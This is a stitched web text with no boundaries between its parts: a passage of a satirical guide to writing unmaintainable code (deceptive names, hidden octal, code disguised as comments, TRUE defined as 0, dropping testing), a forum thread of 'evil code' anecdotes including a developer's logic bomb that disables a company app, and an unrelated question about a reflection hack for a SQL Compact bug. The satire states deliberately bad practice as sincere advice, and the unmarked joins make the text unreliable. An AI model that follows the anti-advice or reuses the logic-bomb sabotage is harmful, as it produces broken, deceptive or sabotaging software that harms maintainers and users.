When using abbreviations inside variable or method names, break the boredom with several variants for the same word, and even spell it out longhand once in while. This helps defeat those lazy bums who use text search to understand only some aspect of your program. Consider variant spellings as a variant on the ploy, e.g. mixing International colour, with American color and dude-speak kulerz. If you spell out names in full, there is only one possible way to spell each name. These are too easy for the maintenance programmer to remember. Because there are so many different ways to abbreviate a word, with abbreviations, you can have several different variables that all have the same apparent purpose. As an added bonus, the maintenance programmer might not even notice they are separate variables.
Obscure film references
Use constant names like LancelotsFavouriteColour instead of blue and assign it hex value of $0204FB. The color looks identical to pure blue on the screen, and a maintenance programmer would have to work out 0204FB (or use some graphic tool) to know what it looks like. Only someone intimately familiar with Monty Python and the Holy Grail would know that Lancelot's favorite color was blue. If a maintenance programmer can't quote entire Monty Python movies from memory, he or she has no business being a programmer.
Document the obvious
Pepper the code with comments like /* add 1 to i */ however, never document wooly stuff like the overall purpose of the package or method.
Document How Not Why
Document only the details of what a program does, not what it is attempting to accomplish. That way, if there is a bug, the fixer will have no clue what the code should be doing.
Side Effects
In C, functions are supposed to be idempotent, (without side effects). I hope that hint is sufficient.
Use Octal
Smuggle octal literals into a list of decimal numbers like this:
array = new int []
{
111,
120,
013,
121,
};
Extended ASCII
Extended ASCII characters are perfectly valid as variable names, including ß, Ð, and ñ characters. They are almost impossible to type without copying/pasting in a simple text editor.
Names From Other Languages
Use foreign language dictionaries as a source for variable names. For example, use the German punkt for point. Maintenance coders, without your firm grasp of German, will enjoy the multicultural experience of deciphering the meaning.
Names From Mathematics
Choose variable names that masquerade as mathematical operators, e.g.:
openParen = (slash + asterix) / equals;
Code That Masquerades As Comments and Vice Versa
Include sections of code that is commented out but at first glance does not appear to be.
for(j=0; j<array_len; j+ =8)
{
total += array[j+0 ];
total += array[j+1 ];
total += array[j+2 ]; /* Main body of
total += array[j+3]; * loop is unrolled
total += array[j+4]; * for greater speed.
total += array[j+5]; */
total += array[j+6 ];
total += array[j+7 ];
}
Without the colour coding would you notice that three lines of code are commented out?
Arbitrary Names That Masquerade as Keywords
When documenting, and you need an arbitrary name to represent a filename use "file ". Never use an obviously arbitrary name like "Charlie.dat" or "Frodo.txt". In general, in your examples, use arbitrary names that sound as much like reserved keywords as possible. For example, good names for parameters or variables would be"bank", "blank", "class", "const ", "constant", "input", "key", "keyword", "kind", "output", "parameter" "parm", "system", "type", "value", "var" and "variable ". If you use actual reserved words for your arbitrary names, which would be rejected by your command processor or compiler, so much the better. If you do this well, the users will be hopelessly confused between reserved keywords and arbitrary names in your example, but you can look innocent, claiming you did it to help them associate the appropriate purpose with each variable.
Code Names Must Not Match Screen Names
Choose your variable names to have absolutely no relation to the labels used when such variables are displayed on the screen. E.g. on the screen label the field "Postal Code" but in the code call the associated variable "zip".
Choosing The Best Overload Operator
In C++, overload +,-,*,/ to do things totally unrelated to addition, subtraction etc. After all, if the Stroustroup can use the shift operator to do I/O, why should you not be equally creative? If you overload +, make sure you do it in a way that i = i + 5; has a totally different meaning from i += 5; Here is an example of elevating overloading operator obfuscation to a high art. Overload the '!' operator for a class, but have the overload have nothing to do with inverting or negating. Make it return an integer. Then, in order to get a logical value for it, you must use '! !'. However, this inverts the logic, so [drum roll] you must use '! ! !'. Don't confuse the ! operator, which returns a boolean 0 or 1, with the ~ bitwise logical negation operator.
Exceptions
I am going to let you in on a little-known coding secret. Exceptions are a pain in the behind. Properly-written code never fails, so exceptions are actually unnecessary. Don't waste time on them. Subclassing exceptions is for incompetents who know their code will fail. You can greatly simplify your program by having only a single try/catch in the entire application (in main) that calls System.exit(). Just stick a perfectly standard set of throws on every method header whether they could actually throw any exceptions or not.
Magic Matrix Locations
Use special values in certain matrix locations as flags. A good choice is the [3][0] element in a transformation matrix used with a homogeneous coordinate system.
Magic Array Slots revisited
If you need several variables of a given type, just define an array of them, then access them by number. Pick a numbering convention that only you know and don't document it. And don't bother to define #define constants for the indexes. Everybody should just know that the global variable widget[15] is the cancel button. This is just an up-to-date variant on using absolute numerical addresses in assembler code.
Never Beautify
Never use an automated source code tidier (beautifier) to keep your code aligned. Lobby to have them banned them from your company on the grounds they create false deltas in PVCS/CVS (version control tracking) or that every programmer should have his own indenting style held forever sacrosanct for any module he wrote. Insist that other programmers observe those idiosyncratic conventions in "his " modules. Banning beautifiers is quite easy, even though they save the millions of keystrokes doing manual alignment and days wasted misinterpreting poorly aligned code. Just insist that everyone use the same tidied format, not just for storing in the common repository, but also while they are editing. This starts an RWAR and the boss, to keep the peace, will ban automated tidying. Without automated tidying, you are now free to accidentally misalign the code to give the optical illusion that bodies of loops and ifs are longer or shorter than they really are, or that else clauses match a different if than they really do. e.g.
if(a)
if(b) x=y;
else x=z;
Testing is for cowards
A brave coder will bypass that step. Too many programmers are afraid of their boss, afraid of losing their job, afraid of customer hate mail and afraid of being sued. This fear paralyzes action, and reduces productivity. Studies have shown that eliminating the test phase means that managers can set ship dates well in advance, an obvious aid in the planning process. With fear gone, innovation and experimentation can blossom. The role of the programmer is to produce code, and debugging can be done by a cooperative effort on the part of the help desk and the legacy maintenance group.
If we have full confidence in our coding ability, then testing will be unnecessary. If we look at this logically, then any fool can recognise that testing does not even attempt to solve a technical problem, rather, this is a problem of emotional confidence. A more efficient solution to this lack of confidence issue is to eliminate testing completely and send our programmers to self-esteem courses. After all, if we choose to do testing, then we have to test every program change, but we only need to send the programmers to one course on building self-esteem. The cost benefit is as amazing as it is obvious.
Reverse the Usual True False Convention
Reverse the usual definitions of true and false. Sounds very obvious but it works great. You can hide:
#define TRUE 0
#define FALSE 1
somewhere deep in the code so that it is dredged up from the bowels of the program from some file that noone ever looks at anymore. Then force the program to do comparisons like:
if ( var == TRUE )
if ( var != FALSE )
someone is bound to "correct" the apparent redundancy, and use var elsewhere in the usual way:
if ( var )
Another technique is to make TRUE and FALSE have the same value, though most would consider that out and out cheating. Using values 1 and 2 or -1 and 0 is a more subtle way to trip people up and still look respectable. You can use this same technique in Java by defining a static constant called TRUE. Programmers might be more suspicious you are up to no good since there is a built-in literal true in Java.
Exploit Schizophrenia
Java is schizophrenic about array declarations. You can do them the old C, way String x[], (which uses mixed pre-postfix notation) or the new way String[] x, which uses pure prefix notation. If you want to really confuse people, mix the notationse.g.
byte[ ] rowvector, colvector , matrix[ ];
which is equivalent to:
byte[ ] rowvector;
byte[ ] colvector;
byte[ ][] matrix;
I don't know if I'd call the code "evil", but we had a developer who would create Object[] arrays instead of writing classes. Everywhere.
I have seen (and posted to thedailywtf) code that will give everyone to have administrator rights in significant part of an application on Tuesdays. I guess the original developer forgot to remove the code after local machine testing.
I don't know if this is "evil" so much as misguided (I recently posted it on The Old New Thing):
I knew one guy who loved to store information as delimited strings. He was familiar with the concept of arrays, as shown when he used arrays of delimited strings, but the light bulb never lit up.
Base 36 encoding to store ints in strings.
I guess the theory goes somewhat along the lines of:
Hexadecimal is used to represent numbers
Hexadecimal doesnt use letters beyond F, meaning G-Z are wasted
Waste is bad
At this moment I am working with a database that is storing the days of the week that an event can happen on as a 7-bit bitfield (0-127), stored in the database as a 2-character string ranging from '0' to '3J'.
I remember seeing a login handler that took a post request, and redirected to a GET with the user name and password passed in as parameters. This was for an "enterprise class" medical system.
I noticed this while checking some logs - I was very tempted to send the CEO his password.
Really evil was this piece of brilliant delphi code:
type
TMyClass = class
private
FField : Integer;
public
procedure DoSomething;
end;
var
myclass : TMyClass;
procedure TMyClass.DoSomething;
begin
myclass.FField := xxx; //
end;
It worked great if there was only one instance of a class. But unfortunately I had to use an other instance and that created lots of interesting bugs.
When I found this jewel, I can't remember if I fainted or screamed, probably both.
Maybe not evil, but certainly rather, um... misguided.
I once had to rewrite a "natural language parser" that was implemented as a single 5,000 line if...then statement.
as in...
if (text == "hello" || text == "hi")
response = "hello";
else if (text == "goodbye")
response = "bye";
else
...
I saw code in an ASP.NET MVC site from a guy who had only done web forms before (and is a renowned copy/paster!) that stuck a client side click event on an <a> tag that called a javascript method that did a document.location.
I tried to explain that a href on the <a> tag would do the same!!!
A little evil...someone I know wrote into the main internal company web app, a daily check to see if he has logged into the system in the past 10 days. If there's no record of him logged in, it disables the app for everyone in the company.
He wrote the piece once he heard rumors of layoffs, and if he was going down, the company would have to suffer.
The only reason I knew about it, is that he took a 2 week vacation & I called him when the site crapped out. He told me to log on with his username/password...and all was fine again.
Of course..months later we all got laid off.
My colleague likes to recall that ASP.NET application which used a public static database connection for all database work.
Yes, one connection for all requests. And no, there was no locking done either.
I remember having to setup IIS 3 to run Perl CGI scripts (yes, that was a looong time ago). The official recommendation at that time was to put Perl.exe in cgi-bin. It worked, but it also gave everyone access to a pretty powerful scripting engine!
Any RFC 3514-compliant program which sets the evil bit.
SQL queries right there in javascript in an ASP application. Can't get any dirtier...
We had an application that loaded all of it's global state in an xml file. No problem with that, except that the developer had created a new form of recursion.
<settings>
<property>
<name>...</name>
<value>...</value>
<property>
<name>...</name>
<value>...</value>
<property>
<name>...</name>
<value>...</value>
<property>
<name>...</name>
<value>...</value>
<property>
<name>...</name>
<value>...</value>
<property>
<name>...</name>
<value>...</value>
<property>
Then comes the fun part. When the application loads, it runs through the list of properties and adds them to a global (flat) list, along with incrementing a mystery counter. The mystery counter is named something totally irrelevant and is used in mystery calculations:
List properties = new List();
Node<-root
while node.hasNode("property")
add to properties list
my_global_variable++;
if hasNode("property")
node=getNode("property"), ... etc etc
And then you get functions like
calculateSumOfCombinations(int x, int y){
return x+y+my_global_variable;
}
edit: clarification - Took me a long time to figure out that he was counting the depth of the recursion, because at level 6 or 7 the properties changed meaning, so he was using the counter to split his flat set into 2 sets of different types, kind of like having a list of STATE, STATE, STATE, CITY, CITY, CITY and checking if the index > counter to see if your name is a city or state)
Instead of writing a Windows service for a server process that needed to run constantly one of our "architects" wrote a console app and used the task scheduler to run it every 60 seconds.
Keep in mind this is in .NET where services are very easy to create.
--
Also, at the same place a console app was used to host a .NET remoting service, so they had to start the console app and lock a session to keep it running every time the server was rebooted.
--
At the last place I worked one of the architects had a single C# source code file with over 100 classes that was something like 250K in size.
32 source code files with more then 10K lines of code each. Each contained one class. Each class contained one method that did "everything"
That was real nightmare for debuging that code before I had to refactor that.
At an earlier workplace, we inherited a legacy project, which partially had been outsorced earlier. The main app was Java, the outsourced part was a native C library. Once I had a look at the C source files. I listed the contents of the directory. There were several source files over 200K in size. The biggest C file was 600 Kbytes.
Thank God I never had to actually touch them :-)
I was given a set of programs to advance while colleagues were abroad at a customer (installing said programs). One key library came up in every program, and trying to figure out the code, I realised that there were tiny differences from one program to the next. In a common library.
Realising this, I ran a text comparison of all copies. Out of 16, I think there were about 9 unique ones. I threw a bit of a fit.
The boss intervened and had the colleagues collate a version that was seemingly universal. They sent the code by e-mail. Unknown to me, there were strings with unprintable characters in there, and some mixed encodings. The e-mail garbled it pretty bad.
The unprintable characters were used to send out data (all strings!) from a server to a client. All strings were thus separated by the 0x03 character on the server-side, and re-assembled client-side in C# using the Split function.
The somwehat sane way would have been to do:
someVariable.Split(Convert.ToChar(0x03);
The saner and friendly way would have been to use a constant:
private const char StringSeparator = (char)0x03;
//...
someVariable.Split(StringSeparator);
The EVIL way was what my colleagues chose: use whatever "prints" for 0x03 in Visual Studio and put that between quotes:
someVariable.Split('/*unprintable character*/');
Furthermore, in this library (and all the related programs), not a single variable was local (I checked!). Functions were designed to either recuperate the same variables once it was deemed safe to waste them, or to create new ones which would live on for all the duration of the process. I printed out several pages and colour coded them. Yellow meant "global, never changed by another function", Red meant "global, changed by several". Green would have been "local", but there was none.
Oh, did I mention control version? Because of course there was none.
ADD ON: I just remembered a function I discovered, not long ago.
Its purpose was to go through an array of arrays of intergers, and set each first and last item to 0. It went like this (not actual code, from memory, and more C#-esque):
FixAllArrays()
{
for (int idx = 0; idx < arrays.count- 1; idx++)
{
currArray = arrays[idx];
nextArray = arrays[idx+1];
SetFirstToZero(currArray);
SetLastToZero(nextArray);
//This is where the fun starts
if (idx == 0)
{
SetLastToZero(currArray);
}
if (idx == arrays.count- 1)
{
SetFirstToZero(nextArray);
}
}
}
Of course, the point was that every sub-array had to get this done, both operations, on all items. I'm just not sure how a programmer can decide on something like this.
Similar to what someone else mentioned above:
I worked in a place that had a pseudo-scripting language in the application. It fed into a massive method that had some 30 parameters and a giant Select Case statement.
It was time to add more parameters, but the guy on the team who had to do it realized that there were too many already.
His solution?
He added a single object parameter on the end, so he could pass in anything he wanted and then cast it.
I couldn't get out of that place fast enough.
Once after our client teams reported some weird problems, we noticed that two different versions of the application was pointing to the same database. (while deploying the new system to them, their database was upgraded, but everyone forgot to bring down their old system)
This was a miracle escape..
And since then, we have an automated build and deploy process, thankfully :-)
I think that it was a program which loaded a loop into the general purpose registers of a pdp-10 and then executed the code in those registers.
You could do that on a pdp-10. That doesn't mean that you should.
EDIT: at least this is to the best of my (sometimes quite shabby) recollection.
I had the deep misfortune of being involved in finding a rather insane behavior in a semi-custom database high-availability solution.
The core bits were unremarkable. Red Hat Enterprise Linux, MySQL, DRBD, and the Linux-HA stuff. The configuration, however, was maintained by a completely custom puppet-like system (unsurprisingly, there are many other examples of insanity resulting from this system).
It turns out that the system was checking the install.log file that Kickstart leaves in the root directory for part of the information it needed to create the DRBD configuration. This in itself is evil, of course. You don't pull configuration from a log file whose format is not actually defined. It gets worse, though.
It didn't store this data anywhere else, and every time it ran, which was every 60 seconds, it consulted install.log.
I'll just let you guess what happened the first time somebody decided to delete this otherwise useless log file.

Hacky Sql Compact Workaround

So, I'm trying to use ADO.NET to stream a file data stored in an image column in a SQL Compact database.
To do this, I wrote a DataReaderStream class that takes a data reader, opened for sequential access, and represents it as a stream, redirecting calls to Read(...) on the stream to IDataReader.GetBytes(...).
One "weird" aspect of IDataReader.GetBytes(...), when compared to the Stream class, is that GetBytes requires the client to increment an offset and pass that in each time it's called. It does this even though access is sequential, and it's not possible to read "backwards" in the data reader stream.
The SqlCeDataReader implementation of IDataReader enforces this by incrementing an internal counter that identifies the total number of bytes it has returned. If you pass in a number either less than or greater than that number, the method will throw an InvalidOperationException.
The problem with this, however, is that there is a bug in the SqlCeDataReader implementation that causes it to set the internal counter to the wrong value. This results in subsequent calls to Read on my stream throwing exceptions when they shouldn't be.
I found some infomation about the bug on this MSDN thread.
I was able to come up with a disgusting, horribly hacky workaround, that basically uses reflection to update the field in the class to the correct value.
The code looks like this:
public override int Read(byte[] buffer, int offset, int count)
{
m_length = m_length ?? m_dr.GetBytes(0, 0, null, offset, count);
if (m_fieldOffSet < m_length)
{
var bytesRead = m_dr.GetBytes(0, m_fieldOffSet, buffer, offset, count);
m_fieldOffSet += bytesRead;
if (m_dr is SqlCeDataReader)
{
//BEGIN HACK
//This is a horrible HACK.
m_field = m_field ?? typeof (SqlCeDataReader).GetField("sequentialUnitsRead", BindingFlags.NonPublic | BindingFlags.Instance);
var length = (long)(m_field.GetValue(m_dr));
if (length != m_fieldOffSet)
{
m_field.SetValue(m_dr, m_fieldOffSet);
}
//END HACK
}
return (int) bytesRead;
}
else
{
return 0;
}
}
For obvious reasons, I would prefer to not use this.
However, I do not want to buffer the entire contents of the blob in memory either.
Does any one know of a way I can get streaming data out of a SQL Compact database without having to resort to such horrible code?
I contacted Microsoft (through the SQL Compact Blog) and they confirmed the bug, and suggested I use OLEDB as a workaround. So, I'll try that and see if that works for me.
Actually, I decided to fix the problem by just not storing blobs in the database to begin with.
This eliminates the problem (I can stream data from a file), and also fixes some issues I might have run into with Sql Compact's 4 GB size limit.